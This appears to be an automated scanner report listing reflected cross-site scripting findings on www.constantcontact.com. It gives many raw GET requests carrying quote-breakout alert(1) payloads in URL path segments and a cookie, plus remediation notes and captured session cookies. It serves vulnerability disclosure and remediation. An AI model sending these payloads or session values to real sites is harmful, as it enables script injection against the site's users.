GET /community9855a'%3balert(1)//c59f81f41b4 HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da525'%3balert(1)//0fa8b10d2b5 was submitted in the REST URL parameter 1. This input was echoed as da525';alert(1)//0fa8b10d2b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 862ba'%3balert(1)//f608c9d0454 was submitted in the REST URL parameter 2. This input was echoed as 862ba';alert(1)//f608c9d0454 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1959'%3balert(1)//23cdf1ecd1d was submitted in the REST URL parameter 1. This input was echoed as a1959';alert(1)//23cdf1ecd1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /email-marketinga1959'%3balert(1)//23cdf1ecd1d/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daeca'%3balert(1)//fb24bf73e27 was submitted in the REST URL parameter 2. This input was echoed as daeca';alert(1)//fb24bf73e27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /email-marketing/daeca'%3balert(1)//fb24bf73e27 HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d0c6'%3balert(1)//06b6ed919e7 was submitted in the REST URL parameter 1. This input was echoed as 9d0c6';alert(1)//06b6ed919e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /event-marketing9d0c6'%3balert(1)//06b6ed919e7/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1406b'%3balert(1)//0352d3379ca was submitted in the REST URL parameter 2. This input was echoed as 1406b';alert(1)//0352d3379ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /event-marketing/1406b'%3balert(1)//0352d3379ca HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7f91'%3balert(1)//0a6cd2be97d was submitted in the REST URL parameter 1. This input was echoed as b7f91';alert(1)//0a6cd2be97d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /b7f91'%3balert(1)//0a6cd2be97d?ssl=false HTTP/1.1 Host: www.constantcontact.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: impcc="IMP_143029301421510=21456138|"; BIGipServerProdLP=2202407946.20480.0000
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6054c'%3balert(1)//43bbe87b01a was submitted in the REST URL parameter 1. This input was echoed as 6054c';alert(1)//43bbe87b01a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fe60'%3balert(1)//4c73750cddf was submitted in the REST URL parameter 2. This input was echoed as 4fe60';alert(1)//4c73750cddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1407e'%3balert(1)//03394fdfa99dd70d2 was submitted in the REST URL parameter 1. This input was echoed as 1407e';alert(1)//03394fdfa99dd70d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18a7'%3balert(1)//b6f7bace160 was submitted in the REST URL parameter 1. This input was echoed as e18a7';alert(1)//b6f7bace160 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e18a7'%3balert(1)//b6f7bace160 HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab77c'%3balert(1)//29b98d35938 was submitted in the REST URL parameter 1. This input was echoed as ab77c';alert(1)//29b98d35938 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ab77c'%3balert(1)//29b98d35938 HTTP/1.1 Host: www.constantcontact.com Proxy-Connection: keep-alive Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000; mbox=check#true#1290653400|session#1290653339802-62786#1290655200
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b206'%3balert(1)//b4df50705c7 was submitted in the REST URL parameter 1. This input was echoed as 5b206';alert(1)//b4df50705c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5b206'%3balert(1)//b4df50705c7 HTTP/1.1 Host: www.constantcontact.com Proxy-Connection: keep-alive Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000; mbox=check#true#1290653400|session#1290653339802-62786#1290655200
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47a5c'%3balert(1)//945ccb545ca was submitted in the REST URL parameter 1. This input was echoed as 47a5c';alert(1)//945ccb545ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /47a5c'%3balert(1)//945ccb545ca HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0cb7'%3balert(1)//4a2bda63320 was submitted in the REST URL parameter 1. This input was echoed as a0cb7';alert(1)//4a2bda63320 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-centera0cb7'%3balert(1)//4a2bda63320/glossary/social-media/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a384'%3balert(1)//45175db367e was submitted in the REST URL parameter 2. This input was echoed as 6a384';alert(1)//45175db367e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/glossary6a384'%3balert(1)//45175db367e/social-media/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e76a'%3balert(1)//ab8d1201eb7 was submitted in the REST URL parameter 3. This input was echoed as 9e76a';alert(1)//ab8d1201eb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/glossary/social-media9e76a'%3balert(1)//ab8d1201eb7/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 514c8'%3balert(1)//ec972dfd61a was submitted in the REST URL parameter 4. This input was echoed as 514c8';alert(1)//ec972dfd61a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
